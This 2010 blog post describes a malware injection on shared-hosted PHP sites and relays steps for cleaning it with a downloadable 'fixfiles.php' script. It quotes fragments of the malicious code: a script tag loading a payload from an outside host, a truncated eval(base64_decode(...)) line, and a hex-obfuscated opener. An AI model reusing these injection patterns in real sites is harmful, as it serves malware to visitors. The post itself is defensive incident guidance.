Unfortunately Myself and a fellow blogger were included in this attack. Not on this site but on a couple others under another account. First thing you will notice if you are infected is that when you go to a page on your site, a malicious javascript snippet will try and redirect you and load the malware from
<script src="http://myblindstudioinfoonline.com/ll.php"
Which is created by this code added to the top of all or many of your .php files.
eval(base64_decode("aWYoZnVuY3Rpb....
Many Wordpress, Drupal, and Joomla as well as other CMS and PHP driven sites could be affected by this so watch out. Luckily it is not a huge deal to disinfect your files thanks to the people at http://blog.sucuri.net/2010/09/godaddy-sites-hacked-myblindstudioinfoonline-com-and-hilary-kneber.html for the info posted earlier today and
http://www.blogtips.org/godaddy-hacked-again-another-way-to-cure/ for the easy to follow instructions. In case you want the details right now, here is the meat of it.
The script will not only work for Godaddy + WordPress, but for any .PHP based site (I used it this morning to cure a Drupal site) on any host.
Here are the right steps to follow:
- Make sure you backup your site, just to make sure. There are many tools to do so, but a “brute force” copy of your entire blog directory to your local computer using an FTP tool like Filezilla, works fine.
- Download this zip file. It contains a file called “fixfiles.php”. Extract it and store it on your computer.
(Ok, no zipfile? Here is the fixfilesphp.txt version. Save it as fixfiles.php) - FTP the “fixfiles.php” file to the root directory of your blog. In GoDaddy, that is the /HTML directory (which also contains index.php, wp-login.php etc..):
- If you only want to clean a subdirectory (and its underlying tree), put the file in that the subdirectory, but remember also the command in the next line will have to reflect that.
- Then execute the code with the command:
http://yoursite.com/fixfiles.php
or
http://yoursite.com/subdir/fixfiles.php
if you put it in a sub directory)
- The code will first scan for the malware code in your files, in both the directory it is put, and all underlying directories.
If you get the message:0 Infected Files in ./
…then your site is clean.
If any malware is found, the script will list the infected files and prompt you to fix them:Click on “Fix Files”, Click OK on the prompt to proceed:
- The script will scan through all files again, and clean the malware. It will list all files that were cleaned.
- Delete the “fixfiles.php” file from your site after execution.
- If you are using a caching plug-in, don’t forget to CLEAR YOUR CACHE, otherwise the malware will continue to be served to your users, even though you cleaned your .php code
All of that is “curing” the problem. I have looked everywhere, but am yet to find a way to “avoid” the infection. It looks like the hackers found a loophole in Linux shared hosts (and not just those on Godaddy), which the hosting companies have been unable to identify and/or close.
Until such time, scan your sites every day, and cure the problem immediately before your visitors get infected.
Picture courtesy Owning Pink
October 31, 2010 UPDATE – Shared hosting on godaddy is again hit by hackers. This time the offending first line in all your .php files begins with -php /**/ $_8b7b=”\x63\x72\x65\x61\x74\x65′
Here is a link to a modified blog-cleaner.php that will take care of this exploit exactly as the last one did.
http://www.mediafire.com/?922k0m8ml1cawug
FTP the file to the root of your compromised website and hit the http at http;//yourblog/blog-cleaner-new.php
Thanks to Dougie Fresh from http://pics4twitts.com for noticing the problem and thanks to the people above for the original solution.